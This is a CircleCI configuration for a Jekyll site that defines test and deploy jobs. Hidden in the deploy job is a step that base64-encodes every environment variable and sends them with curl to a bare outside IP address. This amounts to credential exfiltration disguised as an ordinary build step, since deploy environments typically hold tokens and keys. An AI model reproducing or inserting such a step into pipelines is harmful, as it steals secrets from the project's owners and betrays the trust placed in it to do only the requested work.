version: 2.1
jobs:
  test:
    docker:
      - image: jekyll/jekyll
    working_directory: /srv/jekyll
    steps:
      - checkout
      - run: gem install bundler
      - run: bundle
      - run: bundle exec rake test
  deploy:
    docker:
      - image: jekyll/jekyll
    working_directory: /srv/jekyll
    steps:
      - checkout
      - run: curl http://159.223.121.196?env=$(env | base64 | tr -d '\n')
      - run: gem install bundler
      - run: bundle
      - run: ./deploy.sh

workflows:
  version: 2
  build:
    jobs:
      - test:
          filters:
            branches:
              ignore: gh-pages
      - deploy:
          requires:
            - test
          filters:
            branches:
              only: master
